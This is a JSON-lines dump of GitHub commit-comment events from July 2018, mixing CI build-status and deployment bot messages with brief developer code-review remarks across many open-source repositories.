{"id":"8018940115","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29835312,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T20:48:01Z","updated_at":"2018-07-25T20:48:01Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T20:48:01Z"}
{"id":"8018942600","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29835323,"position":null,"line":null,"path":null,"commit_id":"487aa415bf7f0c023704a19730da1d04d9a7d7b2","created_at":"2018-07-25T20:48:32Z","updated_at":"2018-07-25T20:48:32Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-399](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-399).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-399-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T20:48:32Z"}
{"id":"8018944726","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835329,"position":96,"line":137,"path":"contracts/RockPaperScissors.sol","commit_id":"34f737617e1a0b960ee931aefad396cf7a53d541","created_at":"2018-07-25T20:48:57Z","updated_at":"2018-07-25T20:48:57Z","author_association":"OWNER","body":"Well, there is a pure function in the code that hashes the choice for the players convenience."}},"created_at":"2018-07-25T20:48:57Z"}
{"id":"8018944846","type":"CommitCommentEvent","actor":{"login":"gbrennan22"},"repo":{"name":"gbrennan22/JFFD"},"payload":{"comment":{"id":29835331,"position":null,"line":null,"path":null,"commit_id":"d585271f3407bde83e2c17f3f99e60c64f5b804a","created_at":"2018-07-25T20:48:58Z","updated_at":"2018-07-25T20:48:58Z","author_association":"OWNER","body":"Dataset from John Tegzes altered to make all columns numeric. $type = 0 = grain free, $type = 1 = grain\r\nColumn titles abbreviated to save some typing"}},"created_at":"2018-07-25T20:48:58Z"}
{"id":"8018947372","type":"CommitCommentEvent","actor":{"login":"xificurk"},"repo":{"name":"pepakriz/phpstan-exception-rules"},"payload":{"comment":{"id":29835336,"position":null,"line":null,"path":null,"commit_id":"461c803a7aa1a4b7303c6bd43c533d83c72a1de6","created_at":"2018-07-25T20:49:28Z","updated_at":"2018-07-25T20:49:28Z","author_association":"NONE","body":"Hello, I actually used this feature quite a lot. The new way of using checkedExceptions, or uncheckedExceptions is not so powerful. Example: I want all the RuntimeExceptions checked except for Nette\\InvalidStateException. This is not so easy to do now - I could start building a list of unchecked exceptions: Nette\\InvalidStateException, LogicException and then start adding all the exceptions that inherit directly from Exception (this list will break quite easily). I also ran into oposite case when I wanted one specific type in checked exceptions even though it inherited from \\InvalidArgumentExceptions and I wanted to ignore other LogicExceptions. Neither of those cases can be easily solved with justq one configuration list \r\nWhat was so problematic about this feature? Would you consider bringing it back, or at least some limited/reworked version?"}},"created_at":"2018-07-25T20:49:28Z"}
{"id":"8018952871","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29835353,"position":6,"line":966,"path":"src/main/java/org/jenkinsci/plugins/gitclient/CliGitAPIImpl.java","commit_id":"28db63d60dca2c20c714036c26b9208bd2a6bbbb","created_at":"2018-07-25T20:50:29Z","updated_at":"2018-07-25T20:50:29Z","author_association":"CONTRIBUTOR","body":"@MarkEWaite do you know why `--init` is still used in line 971 now when an explicit init is added here?"}},"created_at":"2018-07-25T20:50:29Z"}
{"id":"8018958820","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29835364,"position":null,"line":null,"path":null,"commit_id":"15e545e4dd205631215a63b50b531cded453bb3d","created_at":"2018-07-25T20:51:42Z","updated_at":"2018-07-25T20:51:42Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3521redire](https://3521redire-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/domains](https://3521redire-static-docs.pantheonsite.io/docs/domains)\n"}},"created_at":"2018-07-25T20:51:42Z"}
{"id":"8018962409","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29835370,"position":null,"line":null,"path":null,"commit_id":"da26773e6f29cb190e372e25b09c4d09e9483586","created_at":"2018-07-25T20:52:26Z","updated_at":"2018-07-25T20:52:26Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3521redire](https://3521redire-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/domains](https://3521redire-static-docs.pantheonsite.io/docs/domains)\n"}},"created_at":"2018-07-25T20:52:26Z"}
{"id":"8018966226","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29835383,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T20:53:13Z","updated_at":"2018-07-25T20:53:13Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T20:53:13Z"}
{"id":"8018972746","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29835399,"position":null,"line":null,"path":null,"commit_id":"cd911ffbf9c144fa47a3f54a7bb75f9ef101a6d9","created_at":"2018-07-25T20:54:33Z","updated_at":"2018-07-25T20:54:33Z","author_association":"OWNER","body":"From looking at just the diff, I don't actually see why this is related to #927 . [I'm sure you're right, that's not the issue...]"}},"created_at":"2018-07-25T20:54:33Z"}
{"id":"8018978791","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"cebe-cc/hetzner-cloud-api-client"},"payload":{"comment":{"id":29835413,"position":null,"line":null,"path":null,"commit_id":"9134914e08a3e6f023d92e6f949775d9802092eb","created_at":"2018-07-25T20:55:44Z","updated_at":"2018-07-25T20:55:44Z","author_association":"MEMBER","body":"hey cool, I will definitively do that. I am on vacation right now, but I will be working on this again mid-August."}},"created_at":"2018-07-25T20:55:44Z"}
{"id":"8018979882","type":"CommitCommentEvent","actor":{"login":"shsr04"},"repo":{"name":"shsr04/sea"},"payload":{"comment":{"id":29835414,"position":null,"line":null,"path":null,"commit_id":"5f0966fd5f6ee3a6fe200860a04daceb6ea40e13","created_at":"2018-07-25T20:55:59Z","updated_at":"2018-07-25T20:55:59Z","author_association":"OWNER","body":"TODO: revert to this commit and add `git submodule update --init` as download step"}},"created_at":"2018-07-25T20:55:59Z"}
{"id":"8018982906","type":"CommitCommentEvent","actor":{"login":"nechry"},"repo":{"name":"OpenZWave/open-zwave"},"payload":{"comment":{"id":29835432,"position":null,"line":null,"path":null,"commit_id":"f589374186594b1331852e9a01d7b3ad36dd07fb","created_at":"2018-07-25T20:56:36Z","updated_at":"2018-07-25T20:56:36Z","author_association":"MEMBER","body":"I don’t have the device, that base from another user feedback. We will see if everything works as expected. We need a base to start. This kind of device requires a secure add."}},"created_at":"2018-07-25T20:56:36Z"}
{"id":"8018983413","type":"CommitCommentEvent","actor":{"login":"vforteli"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29835433,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-25T20:56:41Z","updated_at":"2018-07-25T20:56:41Z","author_association":"OWNER","body":"Tomorrow probably"}},"created_at":"2018-07-25T20:56:41Z"}
{"id":"8018983757","type":"CommitCommentEvent","actor":{"login":"pinhanlim"},"repo":{"name":"pinhanlim/CodeFirst-Project"},"payload":{"comment":{"id":29835434,"position":null,"line":null,"path":null,"commit_id":"37520cdeacb26d3001223fca3aca20f1cf02cf99","created_at":"2018-07-25T20:56:46Z","updated_at":"2018-07-25T20:56:46Z","author_association":"OWNER","body":"recipe page"}},"created_at":"2018-07-25T20:56:46Z"}
{"id":"8018984138","type":"CommitCommentEvent","actor":{"login":"vicktorsk"},"repo":{"name":"vicktorsk/googleauth"},"payload":{"comment":{"id":29835436,"position":12,"line":61,"path":"library/library.php","commit_id":"bc3cc33674dd6f9d992e1ea1128fa1f5bc8992c5","created_at":"2018-07-25T20:56:50Z","updated_at":"2018-07-25T20:56:50Z","author_association":"OWNER","body":"???"}},"created_at":"2018-07-25T20:56:50Z"}
{"id":"8018986182","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29835441,"position":8,"line":39,"path":"packages/compiler-cli/src/ngcc/src/host/esm5_host.ts","commit_id":"fc0fda6732146fa895cd1ff76c540bef4cc0da07","created_at":"2018-07-25T20:57:15Z","updated_at":"2018-07-25T20:57:15Z","author_association":"OWNER","body":"I have no idea what it does tbh :grin: But sometimes `node` was the class declaration `export declare class HttpClientModule` (iirc) 🤷‍♂️ "}},"created_at":"2018-07-25T20:57:15Z"}
{"id":"8018986973","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29835444,"position":5,"line":394,"path":"public/modules/navettes/navettes.viz.js","commit_id":"a176ae1a3784cc7ae8feb07db2a9558bcb17f8f5","created_at":"2018-07-25T20:57:24Z","updated_at":"2018-07-25T20:57:24Z","author_association":"MEMBER","body":"ah oui ! mince !"}},"created_at":"2018-07-25T20:57:24Z"}
{"id":"8018987063","type":"CommitCommentEvent","actor":{"login":"komalsrathi"},"repo":{"name":"komalsrathi/Microarray_Analysis"},"payload":{"comment":{"id":29835445,"position":null,"line":null,"path":null,"commit_id":"4ecef78e9425dea78c2ee610a18a1e0c3a0687f9","created_at":"2018-07-25T20:57:25Z","updated_at":"2018-07-25T20:57:25Z","author_association":"OWNER","body":"Can you please put this as a issue - As a rule, you should never comment on random commits. If you have an issue, just raise an issue with proper header and also please properly format your code.  I cannot follow what your code means or does - it looks gibberish to me without proper formatting. Follow the guidelines here: https://help.github.com/articles/basic-writing-and-formatting-syntax/ "}},"created_at":"2018-07-25T20:57:25Z"}
{"id":"8018990239","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29835450,"position":null,"line":null,"path":null,"commit_id":"523450d3c2a924c51963494cd7b55f3114d1b058","created_at":"2018-07-25T20:58:04Z","updated_at":"2018-07-25T20:58:04Z","author_association":"NONE","body":"A nice follow up to #1661\r\nwhere Score HinderPassedPawn   = S(  5, -1);\r\n\r\nNow  HinderPassedPawn is S(4,  0). Maybe time to drop it  completely ?\r\n"}},"created_at":"2018-07-25T20:58:04Z"}
{"id":"8018995573","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29835460,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T20:59:06Z","updated_at":"2018-07-25T20:59:06Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T20:59:06Z"}
{"id":"8018997728","type":"CommitCommentEvent","actor":{"login":"mneuber55"},"repo":{"name":"mneuber55/new-repository"},"payload":{"comment":{"id":29835467,"position":null,"line":null,"path":null,"commit_id":"fb1658150d0f2af4c471c58143f38fc6183cfa91","created_at":"2018-07-25T20:59:30Z","updated_at":"2018-07-25T20:59:30Z","author_association":"OWNER","body":"This commit sucks"}},"created_at":"2018-07-25T20:59:30Z"}
{"id":"8018998160","type":"CommitCommentEvent","actor":{"login":"sofochka87"},"repo":{"name":"sofochka87/Wave-Sturm"},"payload":{"comment":{"id":29835471,"position":5,"line":24,"path":"src/test/java/com/wave/utilities/BrowserUtils.java","commit_id":"3b93709f8c63a8fbba8479858715cbb9a1a59a19","created_at":"2018-07-25T20:59:35Z","updated_at":"2018-07-25T20:59:35Z","author_association":"OWNER","body":"Great Job"}},"created_at":"2018-07-25T20:59:35Z"}
{"id":"8018999341","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29835475,"position":null,"line":null,"path":null,"commit_id":"412039c6c81cf5634e95f22b902d03b13afe066b","created_at":"2018-07-25T20:59:48Z","updated_at":"2018-07-25T20:59:48Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-281](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-281).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-281-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T20:59:48Z"}
{"id":"8019000229","type":"CommitCommentEvent","actor":{"login":"Athas"},"repo":{"name":"diku-dk/openbanko"},"payload":{"comment":{"id":29835477,"position":null,"line":null,"path":null,"commit_id":"69dd299c59af0c189171ea3ad470bd4957683714","created_at":"2018-07-25T20:59:58Z","updated_at":"2018-07-25T20:59:58Z","author_association":"MEMBER","body":"So can you now bring bankopak testing online on Travis as well?"}},"created_at":"2018-07-25T20:59:58Z"}
{"id":"8019002888","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29835489,"position":null,"line":null,"path":null,"commit_id":"cd911ffbf9c144fa47a3f54a7bb75f9ef101a6d9","created_at":"2018-07-25T21:00:27Z","updated_at":"2018-07-25T21:00:27Z","author_association":"COLLABORATOR","body":"Changes that were made in SolutionCharacterSpec.hs  were really similar to the changes made in SpecificSystemDescription.hs.\r\nI think this is related to #927 since deciding if we want to remove `assembler` will reduce the duplication in both files. (e.g. `generalDefinitionIntro` is defined in both files)"}},"created_at":"2018-07-25T21:00:27Z"}
{"id":"8019004418","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29835492,"position":null,"line":null,"path":null,"commit_id":"141997d63bc4d9b4b71b4cab04720613541899cd","created_at":"2018-07-25T21:00:44Z","updated_at":"2018-07-25T21:00:44Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/141997d63bc4d9b4b71b4cab04720613541899cd/index.html"}},"created_at":"2018-07-25T21:00:44Z"}
{"id":"8019006122","type":"CommitCommentEvent","actor":{"login":"jamesmunns"},"repo":{"name":"denysvitali/blurz"},"payload":{"comment":{"id":29835498,"position":24,"line":157,"path":"src/bluetooth_gatt_characteristic.rs","commit_id":"ba6c9d4cad456dcdb3167684086bd7652d109e7f","created_at":"2018-07-25T21:01:03Z","updated_at":"2018-07-25T21:01:03Z","author_association":"NONE","body":"If it's an option, you'll need to hit it with `.ok_or_else()` first.\r\n\r\nSomething like:\r\n\r\n```\r\nopt_fd.ok_or_else(|| format_err!(\"no file descriptor\"))?\r\n```\r\n\r\nIf you are using `failure`."}},"created_at":"2018-07-25T21:01:03Z"}
{"id":"8019008271","type":"CommitCommentEvent","actor":{"login":"nqpz"},"repo":{"name":"diku-dk/openbanko"},"payload":{"comment":{"id":29835502,"position":null,"line":null,"path":null,"commit_id":"69dd299c59af0c189171ea3ad470bd4957683714","created_at":"2018-07-25T21:01:26Z","updated_at":"2018-07-25T21:01:26Z","author_association":"MEMBER","body":"On Wed, 25 Jul 2018 21:00:07 +0000, Troels Henriksen wrote:\n> So can you now bring bankopak testing online on Travis as well?\n\nAaaany minute now.\n"}},"created_at":"2018-07-25T21:01:26Z"}
{"id":"8019009011","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29835504,"position":null,"line":null,"path":null,"commit_id":"141997d63bc4d9b4b71b4cab04720613541899cd","created_at":"2018-07-25T21:01:34Z","updated_at":"2018-07-25T21:01:34Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/141997d63bc4d9b4b71b4cab04720613541899cd/index.html"}},"created_at":"2018-07-25T21:01:34Z"}
{"id":"8019009062","type":"CommitCommentEvent","actor":{"login":"mpraglowski"},"repo":{"name":"RailsEventStore/rails_event_store"},"payload":{"comment":{"id":29835505,"position":18,"line":68,"path":"ruby_event_store-rom/lib/ruby_event_store/rom/repositories/events.rb","commit_id":"757b4ac85919a4f18b51d3a24288ecf740841fef","created_at":"2018-07-25T21:01:34Z","updated_at":"2018-07-25T21:01:34Z","author_association":"MEMBER","body":"Failed here https://github.com/RailsEventStore/rails_event_store/pull/399/commits/083b4ecad5f47ea3ad4f85a53a71c093b247f019#diff-561af49c465c94f0bc57f00e957635fbR1119"}},"created_at":"2018-07-25T21:01:34Z"}
{"id":"8019022174","type":"CommitCommentEvent","actor":{"login":"orliesaurus"},"repo":{"name":"jgthms/bulma"},"payload":{"comment":{"id":29835536,"position":null,"line":null,"path":null,"commit_id":"48c73101e71234c22e9e7d88c3046ed8abaae6e9","created_at":"2018-07-25T21:04:05Z","updated_at":"2018-07-25T21:04:05Z","author_association":"NONE","body":"awesome!"}},"created_at":"2018-07-25T21:04:05Z"}
{"id":"8019024633","type":"CommitCommentEvent","actor":{"login":"TheYokai"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29835546,"position":null,"line":null,"path":null,"commit_id":"c0c243ac5c0a8b03a64fdb18b0e647ae6427279c","created_at":"2018-07-25T21:04:34Z","updated_at":"2018-07-25T21:04:34Z","author_association":"CONTRIBUTOR","body":"@reduz Thanks for taking the time to work on this PR!"}},"created_at":"2018-07-25T21:04:34Z"}
{"id":"8019035804","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29835566,"position":null,"line":null,"path":null,"commit_id":"c206bb373471b6e725cc080b8818b66dc7fac5c8","created_at":"2018-07-25T21:06:57Z","updated_at":"2018-07-25T21:06:57Z","author_association":"COLLABORATOR","body":"Ok. I see. The multiplication printing and scientific notation are two different issues which should not be solved in the same way."}},"created_at":"2018-07-25T21:06:57Z"}
{"id":"8019036758","type":"CommitCommentEvent","actor":{"login":"artixnous"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29835568,"position":null,"line":null,"path":null,"commit_id":"d2eaf861e67652397fa18fce8e86076743433992","created_at":"2018-07-25T21:07:09Z","updated_at":"2018-07-25T21:07:09Z","author_association":"MEMBER","body":"This is the package I've created for use in our self-hosted gitea. At first it was intended to only be built locally, but building it on our gitea server would possibly introduce delays to the rest of our sites. I'm re-adding it to galaxy, modifying description and conflicting with gitea/gitea-openrc."}},"created_at":"2018-07-25T21:07:09Z"}
{"id":"8019049038","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29835590,"position":null,"line":null,"path":null,"commit_id":"cd911ffbf9c144fa47a3f54a7bb75f9ef101a6d9","created_at":"2018-07-25T21:09:42Z","updated_at":"2018-07-25T21:09:42Z","author_association":"OWNER","body":"Indeed.  This kind of duplication is always a sign that something is wrong.  I think once this current task is done, getting rid of `assembler` is probably the right thing to do."}},"created_at":"2018-07-25T21:09:42Z"}
{"id":"8019049072","type":"CommitCommentEvent","actor":{"login":"RedSparr0w"},"repo":{"name":"simple-icons/simple-icons"},"payload":{"comment":{"id":29835592,"position":null,"line":null,"path":null,"commit_id":"d5585894dfe1e37db75889aa084c195d8d375f0c","created_at":"2018-07-25T21:09:42Z","updated_at":"2018-07-25T21:09:42Z","author_association":"NONE","body":"This change seems to have broken the npm package"}},"created_at":"2018-07-25T21:09:42Z"}
{"id":"8019051378","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29835597,"position":40,"line":85,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"1f88b61ea6065367360d975c8fbabdfd5cd0edee","created_at":"2018-07-25T21:10:13Z","updated_at":"2018-07-25T21:10:13Z","author_association":"NONE","body":"Same as above, I'd prefer to have this name be relevant to the initiating flow."}},"created_at":"2018-07-25T21:10:13Z"}
{"id":"8019052790","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29835598,"position":5,"line":37,"path":"src/formatter/config/WhitespaceConfig.hx","commit_id":"2352070d616c080a164cb953a1483499a1b5b8f1","created_at":"2018-07-25T21:10:31Z","updated_at":"2018-07-25T21:10:31Z","author_association":"MEMBER","body":"\"new\" and \"old\" depends on your point of reference, what if there is a new \"new\"?\r\nIf we can find a proper Name for the \"old\" variant, I could live with calling the new one just `functionTypePolicy`\r\n"}},"created_at":"2018-07-25T21:10:31Z"}
{"id":"8019054092","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29835601,"position":58,"line":102,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"1f88b61ea6065367360d975c8fbabdfd5cd0edee","created_at":"2018-07-25T21:10:48Z","updated_at":"2018-07-25T21:10:48Z","author_association":"NONE","body":"Return at the end of the method."}},"created_at":"2018-07-25T21:10:48Z"}
{"id":"8019056078","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29835605,"position":69,"line":113,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"1f88b61ea6065367360d975c8fbabdfd5cd0edee","created_at":"2018-07-25T21:11:14Z","updated_at":"2018-07-25T21:11:14Z","author_association":"NONE","body":"Delete unused code"}},"created_at":"2018-07-25T21:11:14Z"}
{"id":"8019056626","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29835607,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-25T21:11:19Z","updated_at":"2018-07-25T21:11:19Z","author_association":"COLLABORATOR","body":"@gpleiss not sure if you're aware, but using your nb setup  get a `The class LazyEvaluatedKernelVariable requires a _transpose_nonbatch function!` error when using fewer test points than training points."}},"created_at":"2018-07-25T21:11:19Z"}
{"id":"8019057350","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29835608,"position":null,"line":null,"path":null,"commit_id":"868a5c2b66e8625fc12b60823986776b45f48f39","created_at":"2018-07-25T21:11:26Z","updated_at":"2018-07-25T21:11:26Z","author_association":"CONTRIBUTOR","body":"Same here"}},"created_at":"2018-07-25T21:11:26Z"}
{"id":"8019057801","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29835609,"position":null,"line":null,"path":null,"commit_id":"c206bb373471b6e725cc080b8818b66dc7fac5c8","created_at":"2018-07-25T21:11:32Z","updated_at":"2018-07-25T21:11:32Z","author_association":"OWNER","body":"Right. Even though they definitely look related, but mostly because they are visually related, rather than semantically related."}},"created_at":"2018-07-25T21:11:32Z"}
{"id":"8019059667","type":"CommitCommentEvent","actor":{"login":"nickbp"},"repo":{"name":"mesosphere/dcos-commons"},"payload":{"comment":{"id":29835614,"position":5,"line":53,"path":"sdk/scheduler/src/main/java/com/mesosphere/sdk/scheduler/multi/MultiServiceRunner.java","commit_id":"5e72e8567c13b3664ee72db5cc42f5c3cd16b913","created_at":"2018-07-25T21:11:53Z","updated_at":"2018-07-25T21:11:53Z","author_association":"CONTRIBUTOR","body":"Can the `check()` and `getOrSetVersion()` calls be updated to accept the enum value?"}},"created_at":"2018-07-25T21:11:53Z"}
{"id":"8019059730","type":"CommitCommentEvent","actor":{"login":"jim-minter"},"repo":{"name":"jim-minter/azure-helm"},"payload":{"comment":{"id":29835615,"position":1,"line":1,"path":"pkg/jsonpath/parser.go","commit_id":"881957f36247141ed81e8b1c85b0319544970962","created_at":"2018-07-25T21:11:54Z","updated_at":"2018-07-25T21:11:54Z","author_association":"OWNER","body":"@kargakis this change was mistaken, please run `go get -u golang.org/x/tools/cmd/goyacc` locally"}},"created_at":"2018-07-25T21:11:54Z"}
{"id":"8019060613","type":"CommitCommentEvent","actor":{"login":"GRV96"},"repo":{"name":"GRV96/VecteurPersonnalise"},"payload":{"comment":{"id":29835619,"position":null,"line":null,"path":null,"commit_id":"7a4853aac7257c913fff0bafb3d048d167e09f13","created_at":"2018-07-25T21:12:05Z","updated_at":"2018-07-25T21:12:05Z","author_association":"OWNER","body":"#include <iterator> n'est pas utile. Cette ligne a été supprimée.\r\nLe constructeur par défaut ne fait plus d'allocation de mémoire. Ça causait une fuite de mémoire au premier appel de push_back(T* nouveau)."}},"created_at":"2018-07-25T21:12:05Z"}
{"id":"8019061041","type":"CommitCommentEvent","actor":{"login":"francfly12"},"repo":{"name":"francfly12/MPU6050_GYRO"},"payload":{"comment":{"id":29835620,"position":null,"line":null,"path":null,"commit_id":"b3a3bc7952d1c599b2727c6c94455b2490664d0c","created_at":"2018-07-25T21:12:10Z","updated_at":"2018-07-25T21:12:10Z","author_association":"OWNER","body":"Exemple shown here\r\nhttps://youtu.be/4XDQBN_fasA"}},"created_at":"2018-07-25T21:12:10Z"}
{"id":"8019064116","type":"CommitCommentEvent","actor":{"login":"benjaminapetersen"},"repo":{"name":"benjaminapetersen/js-lunch-and-learn"},"payload":{"comment":{"id":29835624,"position":null,"line":null,"path":null,"commit_id":"02259f42b6fa540aa04faa05b1549e77d4eb01f1","created_at":"2018-07-25T21:12:50Z","updated_at":"2018-07-25T21:12:50Z","author_association":"OWNER","body":"@rhamilto @amarie401 @jgiardino "}},"created_at":"2018-07-25T21:12:50Z"}
{"id":"8019065762","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29835626,"position":null,"line":null,"path":null,"commit_id":"43800e1d0c37306ec6bbce2fbdf7c5d651fcc836","created_at":"2018-07-25T21:13:10Z","updated_at":"2018-07-25T21:13:10Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/43800e1d0c37306ec6bbce2fbdf7c5d651fcc836/index.html"}},"created_at":"2018-07-25T21:13:10Z"}
{"id":"8019070918","type":"CommitCommentEvent","actor":{"login":"marcopelegrini"},"repo":{"name":"kiegroup/droolsjbpm-knowledge"},"payload":{"comment":{"id":29835634,"position":null,"line":null,"path":null,"commit_id":"2a01202b23d6088257843771cbf8b88da6dbffde","created_at":"2018-07-25T21:14:17Z","updated_at":"2018-07-25T21:14:17Z","author_association":"NONE","body":"Hi @mariofusco, thank you for the quick reply. I can definitely work on a test case, but unfortunately that will take me some time which I don't have now.\r\nI can share with you though is how I see the impact of this implementation in the session creation:\r\n\r\n![image](https://user-images.githubusercontent.com/519488/43227885-e2ccf148-9014-11e8-9643-d3072ed77a8f.png)\r\n\r\n\r\nLet me know if it's helpful.\r\n\r\nBTW, this is for about 35 sessions created per second."}},"created_at":"2018-07-25T21:14:17Z"}
